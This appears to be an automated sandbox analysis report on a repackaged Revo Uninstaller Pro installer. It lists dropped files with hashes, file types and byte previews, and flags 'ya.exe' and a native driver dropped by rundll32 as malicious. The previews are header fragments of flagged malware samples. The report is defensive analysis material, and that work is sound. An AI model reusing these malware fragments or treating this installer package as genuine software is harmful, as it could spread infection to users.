                                                                                                                                            Preview:...@..........Wg.....................|.e....................3.Wg.........|.e....i...&lZ{........G.o.o.g.l.e. .C.h.r.o.m.e.........0.5...1.0...2.0.2.3........5C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e....*C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.....G.o.o.g.l.e. .C.h.r.o.m.e.....G.o.o.g.l.e. .L.L.C.....H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.....6.5.5...2.7. .M.B..H.(........".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.1.1.7...0...5.9.3.8...1.3.4.\.I.n.s.t.a.l.l.e.r.\.s.e.t.u.p...e.x.e.". .-.-.u.n.i.n.s.t.a.l.l. .-.-.c.h.a.n.n.e.l.=.s.t.a.b.l.e. .-.-.s.y.s.t.e.m.-.l.e.v.e.l. .-.-.v.e.r.b.o.s.e.-.l.o.g.g.i.n.g.....1.1.7...0...5.9.3.8...1.3.4............AS.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.U.n.i.n.s.t.a.l.l.\.G.o.o.g.l.e. .C.h.r.o.m.e....................../..........M.i.c.r.o.s.o.f.t. .E.d.g.e.....
                                                                                                                                            Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):322
                                                                                                                                            Entropy (8bit):5.182911679867894
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:qcdpfjvAbIQ+q6s25YvtgEgXF1dkrCQHLBkQjvAbIQ+q6s25YvtgEgXF1dkrCSn:nPvadft2XF1dkrCQHOsvadft2XF1dkrZ
                                                                                                                                            MD5:9A3415A7324A8A36284C3694A1C7ED17
                                                                                                                                            SHA1:4FD9DE79A6AA1F825179D27AFF7218504403D8F2
                                                                                                                                            SHA-256:EE70C9E2B208FD50BFD1FAB8F07D0F68057B631457EDBB143F1B429D480E0EBA
                                                                                                                                            SHA-512:73ECDDFC6D4CB52FFAC9FEA1F3C95C7E6D86ACE143F854450BACA5B4A04902697F183D500074D966C6A2BE08EA22FEA01554937CAE3C9DCCCEABA1C46DA5E32B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[09.12.2024 11:39:25.0483] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc..[09.12.2024 11:39:36.0829] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"..
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.7273313271682333
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cdARG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:pQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:6E6C5F4EA9F724C63107CB5D3B3A7AE1
                                                                                                                                            SHA1:DE72662290B805369B4DD9F604491C86F0BD2247
                                                                                                                                            SHA-256:0B36C5C79B725728C6046FB4698FDC6EE78DC2D73D3DD9F7B3DFF86556DB36B3
                                                                                                                                            SHA-512:B8364C3C04B87B2B48C8E030F942B0F783DA4CF02AF00D597D89DF1D38FFE0259703329F353DD8A4CAF591D2209C70A18BF9A817EEE72E206910989AACA27309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ.....XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.7274433900446304
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cBRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:WQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:892FBB3D7F3DE18B7BACEC004742D285
                                                                                                                                            SHA1:106FC29F48948C9547A36B3AAB86A81B57C5988A
                                                                                                                                            SHA-256:1F691234BA139ABA6AD4470E328D18621747E290808CF2985B60B95C9EB51434
                                                                                                                                            SHA-512:5319DEC42EC7324CA6112BB3783067D95B3AAD89AE40F3AB3F88E2A88ED1934445CCD1C24B79B4B33D4D2001FF1167D3ABF57AE3F35E1B8C7FAF255D5B9AFA32
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ.../x.XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6220
                                                                                                                                            Entropy (8bit):3.727245037238303
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:cIRG/eCliU2x0m1GwwukvhkvklCywMSGBFFPL7cnSogZoMyGBFFPL7cnSogZoo1:DQ/eClzptgkvhkvCCtjGpLLHAGpLLHD
                                                                                                                                            MD5:2975A234FD9EF97AE4D5927547FF042F
                                                                                                                                            SHA1:F42456A14F3F7FB80E5058BF5DDB2CE60F44777F
                                                                                                                                            SHA-256:F60D6E07532558DAD4B39D33B4949556543DEBA8F4AC40340FF57919B7A37409
                                                                                                                                            SHA-512:C71F33474B893EDE5FA28FEF5F4E0FBDDB87E638D8EF6928C9CCA3B159F812E70E86032E42876E43667A97E4AC35658FDBC860CB07A4828E2BC41A716227DAF6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...................................FL..................F.".. ....'GDj......,k...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....fj.XJ...N..XJ......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y...........................=...A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......EWsG.Y...........................g.x.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y...........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y............................u(.W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y...Programs..j......EWsG.Y......................@.......?.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsG.Y...........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGEW.H................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:39:27 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1158
                                                                                                                                            Entropy (8bit):4.4956778512660005
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8mzid/0GdV6SRNV/A+2KrNRUdo3qAWdo3V6ETm:8mzid/DdMkPI+2q7Udo3qdo3n
                                                                                                                                            MD5:4D1F0D2BB034A0FBC3D6A4BCFE5673C8
                                                                                                                                            SHA1:A955487FE13D28839032B5EA604A57583A59C090
                                                                                                                                            SHA-256:BA6E6473D2BCF6D740F63730B78B778AC4BBC5B170AB7F6F7E5DCC3E3D9C469A
                                                                                                                                            SHA-512:39EB68D25A0B61EA8CA385CDB8E7BF5DD2B6896429EB7CE0B5018FCEC277167428B425932302E051D11F371C8C4F98166FDE3385DC7A4386D6E3F6B597DB4E65
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.... ....<..vD...P..XJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y...PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y...VSREVO~1..L......Y.Y......(........................V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y...REVOUN~1..Z......Y.Y......(....................U. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y......(........................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q.............9......C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..[.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X..
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 9 15:39:15 2024, mtime=Mon Dec 9 15:39:15 2024, atime=Mon Dec 9 15:39:15 2024, length=179964, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1148
                                                                                                                                            Entropy (8bit):4.509725402147515
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8mMQid/0GdV6SRghbAY2VEdo3thLdo3VVm:8mMQid/DdMkghMY2VEdo3thLdo33
                                                                                                                                            MD5:D3A04B5569577FA3E5176BA822668099
                                                                                                                                            SHA1:8DC274B42A0B9E51B5924B023A87DE53615F4402
                                                                                                                                            SHA-256:F6C5713C6B0F2BD85A110F855E506C99FDC5B8F5766AE3BF95F3E5A0AD79BE56
                                                                                                                                            SHA-512:B9F74A94B4EE7F6DDEF9201BC4C3C8386554E23BA27A61A013EF428A94DB26845F93C67F20B25B03C615196C74C942FCC1CF6FF0E705D61983E31E3A170E9C36
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.... ....i..XJ.....XJ.....XJ...............................P.O. .:i.....+00.../C:\.....................1......Y...PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y...VSREVO~1..L......Y.Y......(........................V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y...REVOUN~1..Z......Y.Y......(....................U. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....h.2......Y. .UNINST~1.EXE..L......Y.Y......)......................:.U.n.i.n.s.t.a.l.l...e.x.e.......p...............-.......o.............9......C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe..Y.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.U.n.i.n.s.t.a.l.l...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......99254
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40
                                                                                                                                            Entropy (8bit):3.3454618442383204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:FkWXltmP+NeQC:93C
                                                                                                                                            MD5:A539950A8AE173D3F1455B1257D4167F
                                                                                                                                            SHA1:70B2E73B4AA800CDFAFBFBC219B011B6DEA42E48
                                                                                                                                            SHA-256:F393157E6DB91DE54F20DD3906C073B84A916B3961D3B7A6A1386474AEA7EF9A
                                                                                                                                            SHA-512:C70CAE153C4708C0A1EEF1EC23DCE0CF6EE487F3DBA6DC697938A206395D8A84EE5B40BAE4EAFA4EE0C74E8E1586D3DA3F1542686102D9FE704D38075173B20A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:sdPC......................C.z..K..9=.p..
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:39:19 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1122
                                                                                                                                            Entropy (8bit):4.532793309251221
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8m4id/0GdV6SRNVAA+2Krado3qAWdo3V6ETm:8m4id/DdMkPX+2qado3qdo3n
                                                                                                                                            MD5:A07B37C64C18AD16D0DA42DBF1B1B919
                                                                                                                                            SHA1:BF1F1AA7F44E28EEFC970557BB1001BEB1F5E85F
                                                                                                                                            SHA-256:62E7BAE26CE95E6EA235EBF13DA0475B3A922306DC94C8D3D333849BA1144B47
                                                                                                                                            SHA-512:9A8FAD76A3ADB0440D81E4E1DAAAB6334D0ABAC14170B0CDFCCD4543C9CB128D173D5D948C98A56DE4645C3AFFF98BC11DA5916DD204C2179A54B4E670C3823D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:L..................F.... ....<..vD..c*..XJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y...PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y...VSREVO~1..L......Y.Y......(........................V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y...REVOUN~1..Z......Y.Y......(....................U. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y......(........................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q.............9......C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..I.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......992547...........hT..CrF.f4...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2227280
                                                                                                                                            Entropy (8bit):7.916292078000363
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:2VAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtX:yAJdi3+ZN06+Nzdn5w8n
                                                                                                                                            MD5:43D37A6E0FE6E9824DFD80221E6AAD13
                                                                                                                                            SHA1:C0413529476272EF942F5CE48187974C060E5DFF
                                                                                                                                            SHA-256:6C7EC72B5223501E376688CECE1DFADDA6DE77209F15439945129B7F5428D4B0
                                                                                                                                            SHA-512:37FB9001682974DF2E2DF02C1362C96AF42BE933AB1F714E3737D1E7280F789778C54E4A11651F94993617F0742826376CB76507158F8E5B49655EA9C5D9EB73
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................."...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32
                                                                                                                                            Entropy (8bit):3.4772170014624826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:alXtRBXFIvCOt:aldTXFcz
                                                                                                                                            MD5:B8F4AE17649F67195291A85DE16B561D
                                                                                                                                            SHA1:1800356941EAFADF247EA9932A02FFEC6C4E4B4C
                                                                                                                                            SHA-256:0FD98AA12C34794DABD32375F4B14B207D4840359AB571D278D2ED490BDDE75A
                                                                                                                                            SHA-512:F640756A1233CC9596AA273C2A4A0296D7F87788486956F8319C4521F27957201DCBA805A7D994B3EAA12249645D5A4B28134C91FE3A4062891612115A941DAC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........:Installer message:.....
                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Entropy (8bit):7.999566849269054
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
